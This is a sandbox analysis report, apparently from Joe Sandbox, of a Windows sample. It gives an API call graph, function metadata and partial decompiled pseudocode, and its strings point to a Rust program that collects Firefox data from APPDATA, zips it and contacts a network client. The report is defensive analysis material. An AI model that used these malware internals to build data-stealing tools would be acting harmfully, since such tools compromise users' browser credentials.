HeapFree 58119->58122 58120 7ff768b834e6 58120->58119 58123 7ff768b89dbe 58120->58123 58126 7ff768b79a56 2 API calls 58121->58126 58130 7ff768b835dc 58121->58130 58122->58121 58124 7ff768bf799f 11 API calls 58123->58124 58125 7ff768b89dd0 58124->58125 58127 7ff768b89ddb HeapFree 58125->58127 58131 7ff768b89ded 58125->58131 58126->58130 58127->58131 58128 7ff768b89e55 58850 7ff768db8c90 14 API calls 58128->58850 58134 7ff768bfb107 4 API calls 58130->58134 58131->58128 58132 7ff768b89e73 58131->58132 58135 7ff768b89e7c 58132->58135 58147 7ff768b8a000 58132->58147 58133 7ff768b89e6e 58139 7ff768b8cd31 58133->58139 58140 7ff768b8cd1d HeapFree 58133->58140 58224 7ff768b83637 58134->58224 58136 7ff768b8cce9 58135->58136 58163 7ff768b89e85 58135->58163 58863 7ff768db8cda 14 API calls 58136->58863 58137 7ff768b841cd 58142 7ff768b7996a 2 API calls 58137->58142 58138 7ff768b8a045 58853 7ff768db8c90 14 API calls 58138->58853 58145 7ff768b79a56 2 API calls 58139->58145 58140->58139 58152 7ff768b84234 58142->58152 58144 7ff768b8cd02 58864 7ff768db9047 15 API calls 58144->58864 58148 7ff768b8cd7c 58145->58148 58146 7ff768b8a063 58169 7ff768b89fb1 58146->58169 58854 7ff768b804f6 17 API calls 58146->58854 58147->58138 58147->58146 58155 7ff768befd87 4 API calls 58152->58155 58153 7ff768b8a0e8 58153->58144 58157 7ff768b8a17c 58153->58157 58154 7ff768b89ed8 58158 7ff768b8cf5e 58154->58158 58855 7ff768db8c90 14 API calls 58154->58855 58161 7ff768b842d2 58155->58161 58159 7ff768c5817a 14 API calls 58157->58159 58160 7ff768b8a186 58159->58160 58160->58133 58162 7ff768b8a192 58160->58162 58161->58161 58168 7ff768befd87 4 API calls 58161->58168 58165 7ff768b8a19a HeapFree 58162->58165 58166 7ff768b8a1ae 58162->58166 58163->58154 58163->58158 58163->58169 58851 7ff768b7a31f 14 API calls 58163->58851 58852 7ff768b804f6 17 API calls 58163->58852 58165->58166 58827 7ff768b79a56 CloseHandle 58166->58827 58172 7ff768b8435c 58168->58172 58169->58153 58856 7ff768b78a04 HeapFree HeapFree 58169->58856 58171 7ff768b827bd 140 API calls 58171->58224 58174 7ff768b74e32 11 API calls 58172->58174 58173 7ff768befd87 4 API calls 58176 7ff768b8a1c3 memcpy 58173->58176 58177 7ff768b843a4 58174->58177 58175 7ff768befd87 4 API calls 58179 7ff768b83855 memcpy 58175->58179 58176->58158 58180 7ff768b8a1e4 58176->58180 58184 7ff768b843b8 HeapFree 58177->58184 58186 7ff768b843c7 58177->58186 58845 7ff768b8e281 18 API calls 58179->58845 58182 7ff768befd87 4 API calls 58180->58182 58185 7ff768b8a1f1 58182->58185 58183 7ff768b7a069 4 API calls 58183->58224 58184->58186 58185->58158 58830 7ff768bb4b86 58185->58830 58186->58186 58188 7ff768befd87 4 API calls 58186->58188 58192 7ff768b844c9 58188->58192 58189 7ff768b81f59 32 API calls 58189->58224 58190 7ff768b8a22a 58193 7ff768b8a2b5 58190->58193 58194 7ff768b8a296 HeapFree 58190->58194 58191 7ff768befd87 4 API calls 58195 7ff768b83b93 memcpy 58191->58195 58192->58192 58198 7ff768befd87 4 API calls 58192->58198 58196 7ff768b8a2c3 58193->58196 58197 7ff768b8ab4e 58193->58197 58194->58193 58195->58224 58196->58158 58836 7ff768b8e216 58196->58836 58200 7ff768b8ab53 HeapFree 58197->58200 58201 7ff768b8ab6a 58197->58201 58202 7ff768b84562 58198->58202 58199 7ff768b7a0cb 2 API calls 58199->58224 58200->58201 58213 7ff768b8abf0 HeapFree 58201->58213 58820 7ff768b89c63 58201->58820 58204 7ff768b74e32 11 API calls 58202->58204 58206 7ff768b845aa 58204->58206 58205 7ff768befd87 4 API calls 58208 7ff768b83ea0 memcpy 58205->58208 58209 7ff768b845cd 58206->58209 58210 7ff768b845be HeapFree 58206->58210 58207 7ff768b8408d memcpy 58211 7ff768b840ec memcpy 58207->58211 58208->58224 58220 7ff768befd87 4 API calls 58209->58220 58210->58209 58214 7ff768b8412b memcpy 58211->58214 58213->58820 58219 7ff768b79c3f 3 API calls 58214->58219 58215 7ff768b8a2f7 58215->58201 58221 7ff768b8a33f HeapFree 58215->58221 58223 7ff768b8a355 58215->58223 58216 7ff768b89d8f HeapFree 58217 7ff768b89da2 58216->58217 58219->58224 58226 7ff768b84614 58220->58226 58221->58223 58222 7ff768b79acc 5 API calls 58222->58224 58223->58158 58227 7ff768bb09e0 5 API calls 58223->58227 58224->58137 58224->58171 58224->58175 58224->58183 58224->58189 58224->58191 58224->58199 58224->58205 58224->58207 58224->58222 58232 7ff768b8419d HeapFree 58224->58232 58846 7ff768b79364 HeapFree HeapFree HeapFree HeapFree 58224->58846 58847 7ff768b8e4f2 18 API calls 58224->58847 58848 7ff768b792f5 HeapFree HeapFree 58224->58848 58849 7ff768b79b23 HeapFree 58224->58849 58226->58226 58233 7ff768befd87 4 API calls 58226->58233 58232->58224 58235 7ff768b8469e 58233->58235 58237 7ff768b74e32 11 API calls 58235->58237 58239 7ff768b846e6 58237->58239 58240 7ff768b84709 58239->58240 58241 7ff768b846fa HeapFree 58239->58241 58242 7ff768befd87 4 API calls 58240->58242 58241->58240 58245 7ff768b84750 58242->58245 58245->58245 58248 7ff768befd87 4 API calls 58245->58248 58820->58216 58820->58217 58823 7ff768bf799f 11 API calls 58822->58823 58824 7ff768b80922 58823->58824 58825 7ff768c64db0 15 API calls 58824->58825 58826 7ff768b8093c 58825->58826 58826->58120 58828 7ff768b79a6e HeapFree 58827->58828 58829 7ff768b79a87 58827->58829 58828->58829 58829->58173 58831 7ff768bb4bdd 58830->58831 58832 7ff768bb4ba2 58830->58832 58831->58190 58833 7ff768bb4bb6 58832->58833 58835 7ff768dbef78 10 API calls 58832->58835 58833->58831 58834 7ff768bb4bc4 memset 58833->58834 58834->58831 58835->58833 58837 7ff768b8e252 58836->58837 58838 7ff768b8e270 GetLastError 58837->58838 58839 7ff768b8e256 58837->58839 58838->58839 58839->58215 58845->58224 58846->58224 58847->58224 58848->58224 58849->58224 58850->58133 58851->58163 58852->58163 58853->58169 58854->58169 58855->58169 58863->58144 58864->58133 58866 7ff768b897fe 58870 7ff768b8970b 58866->58870 58867 7ff768b8984e HeapFree 58867->58870 58868 7ff768bb09e0 5 API calls 58868->58870 58869 7ff768c67140 32 API calls 58869->58870 58870->58866 58870->58867 58870->58868 58870->58869 58871 7ff768ba4d11 58872 7ff768ba4d46 58871->58872 58873 7ff768befd87 4 API calls 58872->58873 58874 7ff768ba4d67 58873->58874 58874->58874 58875 7ff768befd87 4 API calls 58874->58875 58876 7ff768ba4e29 memcpy 58875->58876 58877 7ff768b74e32 11 API calls 58876->58877 58878 7ff768ba4e6d 58877->58878 58879 7ff768ba4e8f 58878->58879 58880 7ff768ba4e80 HeapFree 58878->58880 58881 7ff768befd87 4 API calls 58879->58881 58880->58879 58882 7ff768ba4ed8 58881->58882 58882->58882 58883 7ff768befd87 4 API calls 58882->58883 58884 7ff768ba4f8c 58883->58884 58885 7ff768b74e32 11 API calls 58884->58885 58886 7ff768ba4fd1 58885->58886 58887 7ff768ba4ff3 58886->58887 58888 7ff768ba4fe4 HeapFree 58886->58888 58889 7ff768befd87 4 API calls 58887->58889 58888->58887 58890 7ff768ba503c 58889->58890 58890->58890 58891 7ff768befd87 4 API calls 58890->58891 58892 7ff768ba5169 58891->58892 58893 7ff768b74e32 11 API calls 58892->58893 58894 7ff768ba51af 58893->58894 58895 7ff768ba51d1 58894->58895 58896 7ff768ba51c2 HeapFree 58894->58896 58897 7ff768befd87 4 API calls 58895->58897 58896->58895 58898 7ff768ba521a 58897->58898 58898->58898 58899 7ff768befd87 4 API calls 58898->58899 58900 7ff768ba52bf 58899->58900 58901 7ff768b74e32 11 API calls 58900->58901 58902 7ff768ba5304 58901->58902 58903 7ff768ba5326 58902->58903 58904 7ff768ba5317 HeapFree 58902->58904 58905 7ff768befd87 4 API calls 58903->58905 58904->58903 58906 7ff768ba5376 58905->58906 58906->58906 58907 7ff768befd87 4 API calls 58906->58907 58908 7ff768ba5417 58907->58908 58909 7ff768b74e32 11 API calls 58908->58909 58910 7ff768ba5467 58909->58910 58911 7ff768ba5489 58910->58911 58912 7ff768ba547a HeapFree 58910->58912 58913 7ff768befd87 4 API calls 58911->58913 58912->58911 58914 7ff768ba54f1 58913->58914 58914->58914 59681 7ff768d64b28 59682 7ff768d64b3a 59681->59682 59683 7ff768d64b5e 59682->59683 59684 7ff768d64b51 memset 59682->59684 59684->59683 59685 7ff768bcf90f 59686 7ff768bde207 4 API calls 59685->59686 59687 7ff768bcf919 59686->59687 59688 7ff768bde0e9 10 API calls 59687->59688 59689 7ff768bcf93a 59688->59689 59692 7ff768bcf953 59689->59692 59698 7ff768bde159 6 API calls 59689->59698 59691 7ff768bcf965 HeapFree 59693 7ff768bcfb14 59691->59693 59692->59691 59692->59693 59694 7ff768bde275 4 API calls 59693->59694 59695 7ff768bcfb27 59694->59695 59696 7ff768bcfb43 HeapFree 59695->59696 59697 7ff768bcfb55 59695->59697 59696->59697 59698->59692 59699 7ff768c90883 59700 7ff768c9092f 59699->59700 59701 7ff768c908ab 59699->59701 59703 7ff768c67140 32 API calls 59700->59703 59709 7ff768c8ff55 32 API calls 59701->59709 59704 7ff768c908c6 59703->59704 59705 7ff768c49f27 4 API calls 59704->59705 59706 7ff768c908d4 59704->59706 59707 7ff768c90967 memcpy 59705->59707 59707->59706 59708 7ff768c909ab HeapFree 59707->59708 59708->59706 59709->59704 59710 7ff768d87928 59713 7ff768d8797a 59710->59713 59712 7ff768d87b15 59731 7ff768d66c10 9 API calls _cwprintf_s_l 59712->59731 59713->59712 59715 7ff768d87b33 59713->59715 59724 7ff768d81ca4 59713->59724 59718 7ff768d87bbd 59715->59718 59732 7ff768d7efc4 9 API calls _cwprintf_s_l 59715->59732 59717 7ff768d87c26 59719 7ff768d87c43 59717->59719 59734 7ff768d65b28 memset 59717->59734 59718->59717 59733 7ff768d13e30 memset 59718->59733 59735 7ff768db80f0 8 API calls 2 library calls 59719->59735 59723 7ff768d87c74 59725 7ff768d81ce6 59724->59725 59726 7ff768d81e46 59725->59726 59727 7ff768d81e33 59725->59727 59730 7ff768d81dbb 59725->59730 59737 7ff768d66c10 9 API calls _cwprintf_s_l 59726->59737 59736 7ff768d66c10 9 API calls _cwprintf_s_l 59727->59736 59730->59713 59731->59715 59732->59718 59734->59719 59735->59723 59736->59730 59737->59730 59738 7ff768b78154 59739 7ff768b7815f 59738->59739 59741 7ff768b78191 HeapFree 59739->59741 59767 7ff768c49f77 HeapFree 59739->59767 59741->59739 59742 7ff768b781a8 59741->59742 59743 7ff768b781c8 AcquireSRWLockExclusive 59742->59743 59762 7ff768b78358 59742->59762 59756 7ff768b781ed 59743->59756 59745 7ff768b78408 59747 7ff768b7842f 59745->59747 59751 7ff768b78418 HeapFree 59745->59751 59746 7ff768b783ef HeapFree 59746->59745 59748 7ff768b78438 HeapFree 59747->59748 59749 7ff768b78461 59747->59749 59748->59749 59752 7ff768b780a0 2 API calls 59749->59752 59750 7ff768b78389 59750->59745 59750->59746 59755 7ff768b783d8 HeapFree 59750->59755 59771 7ff768c49f77 HeapFree 59750->59771 59751->59747 59751->59751 59753 7ff768b7846d 59752->59753 59755->59746 59755->59750 59757 7ff768c4ac60 ReleaseSRWLockExclusive 59756->59757 59758 7ff768b7825e 59757->59758 59759 7ff768b78527 59758->59759 59758->59762 59768 7ff768c68b50 8 API calls 59758->59768 59772 7ff768c61400 HeapFree HeapFree 59759->59772 59761 7ff768b7830b 59761->59762 59769 7ff768c68320 AcquireSRWLockExclusive HeapFree HeapFree ReleaseSRWLockExclusive 59761->59769 59762->59750 59770 7ff768be6f70 HeapFree 59762->59770 59765 7ff768b785f5 59766 7ff768b7834f 59766->59759 59766->59762 59767->59739 59768->59761 59769->59766 59770->59750 59771->59750 59772->59765 59773 7ff768b81853 59774 7ff768b8185b 59773->59774 59775 7ff768bb09e0 5 API calls 59774->59775 59778 7ff768b81ef0 59774->59778 59776 7ff768b818e2 59775->59776 59777 7ff768bb0dd0 6 API calls 59776->59777 59779 7ff768b818f2 59777->59779 59780 7ff768db9d40 4 API calls 59778->59780 59782 7ff768bb09e0 5 API calls 59779->59782 59781 7ff768b81f57 59780->59781 59783 7ff768b819c9 59782->59783 59784 7ff768b819e4 59783->59784 59785 7ff768b819d0 HeapFree 59783->59785 59786 7ff768b81a06 59784->59786 59787 7ff768b819ef HeapFree 59784->59787 59785->59784 59788 7ff768b755ab 25 API calls 59786->59788 59787->59786 59789 7ff768b81a53 59788->59789 59790 7ff768b81a9e 59789->59790 59791 7ff768b81a59 59789->59791 59793 7ff768b81b3f memcpy memcpy 59790->59793 59798 7ff768b81ae1 59790->59798 59792 7ff768b81a87 HeapFree 59791->59792 59791->59798 59792->59798 59799 7ff768b81bb9 59793->59799 59794 7ff768b81e9b HeapFree 59795 7ff768b81eb2 59794->59795 59796 7ff768b81ecb 59795->59796 59797 7ff768b81eb8 HeapFree 59795->59797 59797->59796 59798->59794 59798->59795 59799->59778 59799->59798 59807 7ff768b81cec 59799->59807 59809 7ff768b73f1f 59799->59809 59803 7ff768bad0e0 3 API calls 59804 7ff768b81d76 59803->59804 59804->59778 59805 7ff768b81d7f 59804->59805 59806 7ff768b73f1f 22 API calls 59805->59806 59805->59807 59816 7ff768db92f6 10 API calls 59805->59816 59806->59805 59817 7ff768b78ad9 HeapFree HeapFree HeapFree HeapFree 59807->59817 59811 7ff768b73f44 59809->59811 59810 7ff768b80ba5 19 API calls 59810->59811 59811->59810 59813 7ff768b74173 HeapFree 59811->59813 59814 7ff768b74132 HeapFree 59811->59814 59815 7ff768b73ff3 59811->59815 59818 7ff768b80ae0 19 API calls 59811->59818 59813->59811 59814->59811 59815->59803 59815->59807 59816->59805 59817->59798 59818->59811 59819 7ff768d5e070 59820 7ff768d5e083 59819->59820 59825 7ff768d5e0d0 42 API calls 59820->59825 59822 7ff768d5e09b 59823 7ff768d5e0ab 59822->59823 59826 7ff768d5e180 59822->59826 59825->59822 59828 7ff768d5e1a4 59826->59828 59829 7ff768d5e20a 59826->59829 59828->59829 59830 7ff768d0d26c 59828->59830 59829->59823 59833 7ff768d0d299 59830->59833 59832 7ff768d0d2a6 59832->59829 59833->59832 59834 7ff768d511dc 59833->59834 59835 7ff768d511ef 59834->59835 59836 7ff768d51204 59835->59836 59838 7ff768d4c084 59835->59838 59836->59832 59839 7ff768d4c0b2 59838->59839 59840 7ff768d4c094 59838->59840 59842 7ff768d4cf40 memset 59839->59842 59843 7ff768d4d0f0 59839->59843 59840->59839 59844 7ff768d80ca0 59840->59844 59842->59843 59843->59836 59845 7ff768d80cc9 59844->59845 59850 7ff768d80cc1 59844->59850 59846 7ff768d80da1 59845->59846 59847 7ff768d80ce4 59845->59847 59845->59850 59846->59850 59866 7ff768d4c9a4 22 API calls 59846->59866 59847->59850 59851 7ff768d4bb64 59847->59851 59850->59839 59852 7ff768d4bb8f 59851->59852 59854 7ff768d4bb9d 59851->59854 59853 7ff768d7f0a0 memset 59852->59853 59853->59854 59855 7ff768d4bbd1 59854->59855 59857 7ff768d4bbde 59854->59857 59861 7ff768d4bbad 59854->59861 59867 7ff768d4be2c 59855->59867 59860 7ff768d4bc2f 59857->59860 59878 7ff768d4cc80 6 API calls 59857->59878 59859 7ff768d4bdc7 59859->59861 59880 7ff768d4cc80 6 API calls 59859->59880 59864 7ff768d4bce8 59860->59864 59879 7ff768d4cc80 6 API calls 59860->59879 59861->59850 59864->59859 59864->59861 59865 7ff768d4bda3 memset 59864->59865 59865->59859 59866->59850 59868 7ff768d4be60 memcpy 59867->59868 59869 7ff768d4bee1 59867->59869 59877 7ff768d4be84 59868->59877 59887 7ff768d81f00 9 API calls _cwprintf_s_l 59869->59887 59871 7ff768d4bed3 59871->59869 59886 7ff768daa4f8 memset 59871->59886 59872 7ff768d4bf0f 59872->59861 59873 7ff768d4beed 59873->59872 59875 7ff768d4c004 4 API calls 59873->59875 59875->59873 59877->59871 59881 7ff768d4c004 59877->59881 59878->59857 59879->59860 59880->59859 59888 7ff768d80400 memset memset 59881->59888 59883 7ff768d4c022 59884 7ff768d4c036 59883->59884 59889 7ff768d5068c 59883->59889 59884->59877 59886->59869 59887->59873 59888->59883 59891 7ff768d506bf 59889->59891 59890 7ff768d5077b 59890->59884 59891->59890 59892 7ff768d5076e memcpy 59891->59892 59893 7ff768d50762 memset 59891->59893 59892->59890 59893->59890 59894 7ff768ba0e0b 59896 7ff768ba0e1d 59894->59896 59897 7ff768bf799f 11 API calls 59896->59897 59899 7ff768ba0f9a 59896->59899 59904 7ff768ba1387 59896->59904 59939 7ff768bf8a07 6 API calls 59896->59939 59940 7ff768bf5c14 10 API calls 59896->59940 59897->59896 59935 7ff768bf89cd 59899->59935 59902 7ff768bb09e0 5 API calls 59903 7ff768ba1009 59902->59903 59905 7ff768ba1013 HeapFree 59903->59905 59906 7ff768ba1029 59903->59906 59905->59906 59907 7ff768ba1030 HeapFree 59906->59907 59908 7ff768ba1043 59906->59908 59907->59908 59909 7ff768c69160 19 API calls 59908->59909 59910 7ff768ba10a5 59909->59910 59911 7ff768c66120 23 API calls 59910->59911 59912 7ff768ba10b4 59911->59912 59912->59904 59913 7ff768ba10bd CoInitializeEx 59912->59913 59913->59904 59914 7ff768ba10d1 CoInitializeSecurity 59913->59914 59914->59904 59915 7ff768ba110c 59914->59915 59916 7ff768bb09e0 5 API calls 59915->59916 59917 7ff768ba11e9 59916->59917 59918 7ff768ba11f0 HeapFree 59917->59918 59919 7ff768ba1202 59917->59919 59918->59919 59920 7ff768c67140 32 API calls 59919->59920 59921 7ff768ba1240 59920->59921 59922 7ff768bac759 59921->59922 59924 7ff768ba1245 59921->59924 59941 7ff768c77f20 8 API calls 59922->59941 59925 7ff768b754e5 24 API calls 59924->59925 59926 7ff768ba12b2 59925->59926 59926->59904 59927 7ff768ba12bb CloseHandle 59926->59927 59929 7ff768ba12ed 59927->59929 59932 7ff768bb09e0 5 API calls 59929->59932 59933 7ff768ba137f 59932->59933 59934 7ff768b754e5 24 API calls 59933->59934 59934->59904 59936 7ff768bf89d2 59935->59936 59937 7ff768ba0fa2 59935->59937 59936->59937 59938 7ff768bf89dc HeapFree 59936->59938 59937->59902 59939->59896 59940->59896 59942 7ff768b9e54e 59943 7ff768b9e62a 59942->59943 59944 7ff768c46f84 14 API calls 59943->59944 59945 7ff768b9e647 59944->59945 59946 7ff768c40be4 165 API calls 59945->59946 59947 7ff768b9e64f 59946->59947 59948 7ff768c44d8f 79 API calls 59947->59948 59949 7ff768b9e68c 59948->59949 59950 7ff768c471e4 35 API calls 59949->59950 59969 7ff768ba4cf2 59949->59969 59951 7ff768b9e7a9 59950->59951 59952 7ff768c47a98 56 API calls 59951->59952 59953 7ff768b9e7c9 memcpy 59952->59953 59954 7ff768c363f0 140 API calls 59953->59954 59955 7ff768b9e7fd 59954->59955 59956 7ff768b78d9c 19 API calls 59955->59956 59957 7ff768b9e85f 59956->59957 59958 7ff768b9e91e memcpy memcpy memcpy memcpy memcpy 59957->59958 59957->59969 59959 7ff768b7eb04 17 API calls 59958->59959 59960 7ff768b9ea95 59959->59960 60447 7ff768b79bdd 59960->60447 59962 7ff768b9eadb 59963 7ff768b77b28 3 API calls 59962->59963 59964 7ff768b9ed74 59963->59964 59965 7ff768befd87 4 API calls 59964->59965 59964->59969 59966 7ff768b9ee55 59965->59966 59967 7ff768b9ee83 59966->59967 59968 7ff768c51b93 10 API calls 59966->59968 59970 7ff768c5897d memcmp 59967->59970 59968->59967 59971 7ff768b9ef16 59970->59971 59971->59969 59972 7ff768bb09e0 5 API calls 59971->59972 59973 7ff768b9efa7 59972->59973 59974 7ff768b9efc0 59973->59974 59975 7ff768c51b93 10 API calls 59973->59975 59976 7ff768c5897d memcmp 59974->59976 59975->59974 59977 7ff768b9f085 59976->59977 59977->59969 59978 7ff768bb09e0 5 API calls 59977->59978 59979 7ff768b9f10b 59978->59979 59980 7ff768b9f11d 59979->59980 59981 7ff768c51b93 10 API calls 59979->59981 59982 7ff768c5897d memcmp 59980->59982 59981->59980 59983 7ff768b9f1b0 59982->59983 59983->59969 59984 7ff768bb09e0 5 API calls 59983->59984 60448 7ff768b79c07 60447->60448 60449 7ff768b79bf1 60447->60449 60456 7ff768b78f21 HeapFree 60448->60456 60449->59962 60457 7ff768c6b140 60458 7ff768c6b16a 60457->60458 60459 7ff768c6b268 60457->60459 60460 7ff768c6b177 memcpy 60458->60460 60463 7ff768c6b27a 60458->60463 60482 7ff768dbde60 60459->60482 60462 7ff768c6b196 60460->60462 60464 7ff768c6b1b7 60462->60464 60468 7ff768c6b1db getaddrinfo 60462->60468 60465 7ff768bad0e0 3 API calls 60463->60465 60466 7ff768dbe042 60463->60466 60467 7ff768dbdf0c 60465->60467 60472 7ff768db9d40 4 API calls 60466->60472 60467->60466 60469 7ff768dbdf15 memcpy 60467->60469 60468->60464 60470 7ff768c6b219 WSAGetLastError 60468->60470 60471 7ff768dbdf43 60469->60471 60470->60464 60474 7ff768dbdf89 60471->60474 60476 7ff768dbe02f 60471->60476 60477 7ff768dbdf65 HeapFree 60471->60477 60473 7ff768dbe070 60472->60473 60486 7ff768bb0390 6 API calls 60474->60486 60477->60474 60478 7ff768dbdfa6 getaddrinfo 60479 7ff768dbdfe1 WSAGetLastError 60478->60479 60480 7ff768dbdffb 60478->60480 60479->60480 60480->60476 60481 7ff768dbe01d HeapFree 60480->60481 60481->60476 60483 7ff768dbde71 60482->60483 60484 7ff768dbde76 60482->60484 60483->60458 60485 7ff768dbd330 7 API calls 60484->60485 60485->60483 60486->60478

                                                                                          Executed Functions

                                                                                          Function 00007FF768BA4D11 Relevance: 302.7, APIs: 154, Strings: 16, Instructions: 5163memorytimewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.272345545.00007FF768B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF768B70000, based on PE: true
                                                                                          • Associated: 00000000.00000002.272303779.00007FF768B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273147528.00007FF768E7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.273166957.00007FF768E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff768b70000_SecuriteInfo.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$Free$memcpy$Delete$Time$BoundaryDescriptor$CreateFileSystem$CloseDisplayEnumErrorHandleLastObjectmemset$CapsCompatibleDeviceMonitorsStretch$AllocBitmapBitsFindInformationLocalModeNextPrivilegeProcessReleaseSelectSettingsSpecificZonememcmp
                                                                                          • String ID: $%0A$%APPDATA%$($,!_k$APPDATAsrc\firefox\firefox.rs$Client::new()$IEND$application/zip$assertion failed: nsec >= 0 && nsec < NSEC_PER_SECC:\Users\user\.cargo\registry\src\github.com-1ecc6299db9ec823\time-0.1.45\src\lib.rs$attempt to divide by zero$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$failed to write whole buffer$fdAT$utf-8$yHql_`%
                                                                                          • API String ID: 3773530764-157824920
                                                                                          • Opcode ID: 78167e416a5763590fea44f3da3bf3387c80c93467eeea0cafd622e9b091d722
                                                                                          • Instruction ID: 930bf075be3326b7d5ae2b8dc1ac5fb3aa8d11fe42a6f17c90cfebe1ebed2806
                                                                                          • Opcode Fuzzy Hash: 78167e416a5763590fea44f3da3bf3387c80c93467eeea0cafd622e9b091d722
                                                                                          • Instruction Fuzzy Hash: 91D35872A08BC1C9E7319F25D8443E9B3A5FB48B88F844136DA4D4BB99DF38E255C364
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00007FF768B834B8 Relevance: 215.5, APIs: 128, Strings: 11, Instructions: 7024memoryCOMMONCrypto
                                                                                          Download Yara Rule
                                                                                          C-Code - Quality: 26%
                                                                                          			E00007FF77FF768B834B8(void* __ebp, void* __esp, void* __eflags, long long __rbx, void* __rsi, void* __r9, signed int __r11, void* __r12) {
				void* _t1115;
				signed int _t1121;
				signed int _t1132;
				void* _t1139;
				void* _t1147;
				void* _t1149;
				int _t1152;
				int _t1160;
				void* _t1162;
				int _t1165;
				void* _t1167;
				int _t1170;
				void* _t1172;
				void* _t1176;
				void* _t1180;
				int _t1183;
				void* _t1185;
				int _t1188;
				void* _t1190;
				int _t1193;
				void* _t1195;
				int _t1201;
				void* _t1203;
				int _t1206;
				int _t1210;
				int _t1214;
				void* _t1222;
				int _t1225;
				int _t1231;
				void* _t1235;
				int _t1246;
				void* _t1248;
				int _t1251;
				void* _t1253;
				int _t1256;
				void* _t1261;
				int _t1267;
				void* _t1269;
				void* _t1273;
				int _t1276;
				void* _t1426;
				void* _t1428;
				void* _t1459;
				long long _t1502;
				long long _t1509;
				long long _t1514;
				long long _t1607;
				intOrPtr* _t1609;
				signed long long _t1610;
				long long _t1612;
				long long* _t1616;
				signed long long _t1620;
				long long _t1621;
				signed long long _t1626;
				long long _t1627;
				long long _t1628;
				long long _t1641;
				signed long long _t1736;
				signed long long _t1750;
				long long _t1763;
				long long _t1767;
				long long _t1768;
				long long _t1772;
				intOrPtr _t1773;
				signed long long _t1775;
				signed long long _t1783;
				signed long long _t1791;
				signed long long _t1799;
				signed long long _t1807;
				intOrPtr* _t1815;
				signed int _t1825;
				long long _t1841;
				signed int _t1858;
				long long _t2093;
				signed long long _t2094;
				long long _t2097;
				long long _t2113;
				signed long long* _t2128;
				signed long long _t2135;
				signed long long* _t2139;
				signed long long* _t2143;
				signed long long* _t2147;
				signed long long* _t2151;
				signed long long* _t2155;
				signed long long* _t2159;
				signed long long* _t2163;
				signed long long* _t2167;
				signed long long* _t2171;
				signed int* _t2175;
				signed long long* _t2179;
				signed long long* _t2183;
				signed long long* _t2187;
				signed long long _t2191;
				signed long long _t2195;
				signed long long _t2199;
				signed long long* _t2203;
				signed long long* _t2207;
				signed long long* _t2211;
				signed long long* _t2215;
				signed long long* _t2219;
				signed long long* _t2223;
				signed long long* _t2227;
				signed long long* _t2231;
				signed long long* _t2235;
				signed long long* _t2239;
				intOrPtr* _t2240;
				intOrPtr* _t2242;
				long long _t2248;
				long long _t2250;
				long long _t2251;
				long long _t2256;
				signed int _t2261;
				signed long long _t2263;
				intOrPtr* _t2279;
				signed int _t2282;
				signed int _t2292;
				intOrPtr _t2303;
				long long _t2397;
				signed int _t2400;
				signed int _t2404;
				long long _t2409;
				unsigned long long _t2411;
				signed long long _t2413;
				signed long long _t2442;
				signed long long _t2445;
				signed long long _t2448;
				void* _t2470;
				long long* _t2471;
				signed long long _t2499;
				signed long long _t2527;
				signed long long _t2529;
				signed long long _t2531;
				long long* _t2553;
				long long* _t2554;
				long long* _t2555;
				long long* _t2556;
				long long* _t2557;
				long long* _t2558;
				long long* _t2559;
				long long* _t2560;
				long long* _t2561;
				long long* _t2562;
				long long* _t2563;
				long long* _t2564;
				long long* _t2565;
				long long* _t2566;
				long long* _t2567;
				long long* _t2568;
				long long* _t2569;
				long long* _t2570;
				long long* _t2571;
				long long* _t2572;
				long long* _t2573;
				long long* _t2574;
				long long* _t2575;
				long long* _t2576;
				long long* _t2577;
				long long* _t2578;
				long long* _t2579;
				signed long long _t2585;
				signed long long _t2586;
				signed long long _t2587;
				void* _t2590;
				void* _t2596;
				unsigned long long _t2599;
				intOrPtr _t2600;
				void* _t2601;
				void* _t2603;
				unsigned long long _t2606;
				void* _t2609;
				long long _t2613;
				signed long long _t2617;
				signed long long _t2618;
				signed long long _t2619;
				signed int _t2622;
				signed int _t2625;

				_t2471 = _t2470 + 0xf0;
				 *_t2471 = __rbx;
				 *((long long*)(_t2471 + 8)) = 1;
				 *((long long*)(_t2471 + 0x10)) = __rbx;
				_t2240 = _t2470 + 0x30;
				E00007FF77FF768B808F1(_t2240, _t2470 + 0x210, _t2471);
				if ( *_t2240 == __rbx) goto 0x68b83546;
				goto 0x68b83577;
				_t2242 = _t2470 + 0xf0;
				E00007FF77FF768B808F1(_t2242, _t2470 + 0x210, __rsi);
				_t2397 = _t2470 + 0x30;
				E00007FF77FF768BBBF10(_t2397,  *((intOrPtr*)(__r12 + 0x38)),  *((intOrPtr*)(__r12 + 0x40)), __r9);
				_t1607 =  *_t2242;
				if ( *_t2397 == 0) goto 0x68b8359b;
				if (_t1607 == 0) goto 0x68b835b2;
				goto 0x68b835b9;
				_t1763 = _t2470 + 0x30;
				_t2093 =  *(_t2470 + 0xf8);
				E00007FF77FF768BBBF10(_t1763, _t2093,  *((intOrPtr*)(_t2470 + 0x100)), __r9);
				if ( *_t1763 == 0) goto 0x68b89dbe;
				if ( *(_t2470 + 0xf0) == 0) goto 0x68b835c2;
				HeapFree(??, ??, ??);
				goto 0x68b835c2;
				 *((long long*)(__r12 + 0x40)) = _t1763;
				if (_t1607 != 0) goto 0x68b835c2;
				goto 0x68b89df7;
				 *((long long*)(__r12 + 0x40)) = 0;
				 *(_t2470 + 0x30) = 0x68e2bf50;
				0x68b7875f();
				E00007FF77FF768B79A56();
				sil = 0x17;
				_t1815 = _t2470 + 0x30;
				 *_t1815 = sil;
				_t1426 =  *(_t2470 + 0x360);
				_t1459 =  *(_t2470 + 0x363);
				 *(_t1815 + 1) = _t1426;
